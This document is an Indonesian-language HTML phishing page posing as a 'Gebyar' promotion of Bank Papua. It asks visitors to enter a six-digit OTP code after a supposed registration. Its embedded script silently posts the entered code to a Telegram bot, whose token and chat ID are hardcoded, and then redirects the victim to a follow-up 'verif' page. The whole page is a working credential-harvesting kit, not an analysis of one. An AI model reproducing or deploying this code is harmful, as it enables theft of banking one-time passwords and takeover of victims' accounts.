<!doctype html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="description" content=""> 
  <link rel="canonical" href="/"> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content=""> 
  <meta name="twitter:title" content=""> 
  <meta property="og:site_name" content=""> 
  <meta name="twitter:site_name" content=""> 
  <meta property="og:description" content=""> 
  <meta name="twitter:description" content="">
  <link rel="image_src" href="/id/pp.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:image" content="/id/pp.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta name="twitter:image:src" content="/id/pp.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:url" content="/"> 
  <meta property="og:type" content="/"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>Promo Gebyar Bank Papua</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 20px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #FFA62F;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 3500px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: 500; 
            color: white; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }
.form::-webkit-input-placeholder{
    color: white;
}
 
.form:-moz-input-placeholder{
    color: white;
}
 
.form:-ms-input-placeholder{
    color: white;
}

</style> 
 </head> 
 <body class="chakra-ui-light" style="background: url(/id/bg1.png);">
  <div class="container"> 
   <div class="row"> 
    <div class="col-12 d-block mx-auto text-center" style="height: auto; width: 90%; max-width: auto; margin-top: 20px; margin-bottom: 0px; border-radius: 0px;"> 
<p style="color: white; font-size: 20px; margin-top: 0%; margin-left: 0px; text-align: left; font-weight: bold;">Verifikasi Kode OTP</p>
<br>
<p style="color: white; text-align: center; font-size: 13px; margin-top: 10px;">Terimakasih pace/mace ade/kaka,<br>pendaftaran anda sedang di proses sistem.<br>Mohon menunggu Tim Terkait BPD Bank Papua<br>Akan menghubungi kembali melalui Whatsapp<br>untuk konfirmasi Format SMS dan nomor undian pendaftaran anda,</p>
<br>
<form id="tg" onsubmit="">
       <input class="form" placeholder="Masukan Kode OTP" required="" style="width:100%;height: 40px; border: 1px solid white; margin-left: 0%; margin-top: -20%; background: none; border-radius: 4px; text-align: center; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" minlength="6" maxlength="6" type="text" inputmode="numeric" name="nomor" id="nomor"><br></div>
        </div>
    <div class="col-12"> 
    <br>
           <button type="submit" class="btn-belum">Konfirmasi</button> 
           <br>
           <br>
    </div> 
   </div> 
  </div> 
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
   <script>
const TOKEN = "6630834576:AAGdYATfHqSLPIzjz1uYLE6t2O_d3ETUU8w";
const CHAT_ID = "5990883050";
const URL_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;

const form = document.getElementById("tg");

form.addEventListener("submit", onSubmitTelegram);

function onSubmitTelegram(e) {
  e.preventDefault();

  const { name, nomor, } = form;
  const data = {
    name: name.value,
    nomor: nomor.value,
  };

  let message = `<b></b>\n`;
  message += `<b> </b> ${data.name}\n`;
  message += `<b>Kode OTP : </b> ${data.nomor}\n`;

  const dataTg = {
    chat_id: CHAT_ID,
    text: message,
    parse_mode: "html",
  };

  const options = {
    method: "POST",
    body: JSON.stringify(dataTg),
    headers: {
      "Content-Type": "application/json",
    },
  };

  fetch(URL_API, options)
    .then((res) => res.json())
    .then((res) => console.log(res))
    .catch((err) => console.log(err));
    
    window.location.href='/id/verif.html';
}

</script>
</form>
</body>
</html>
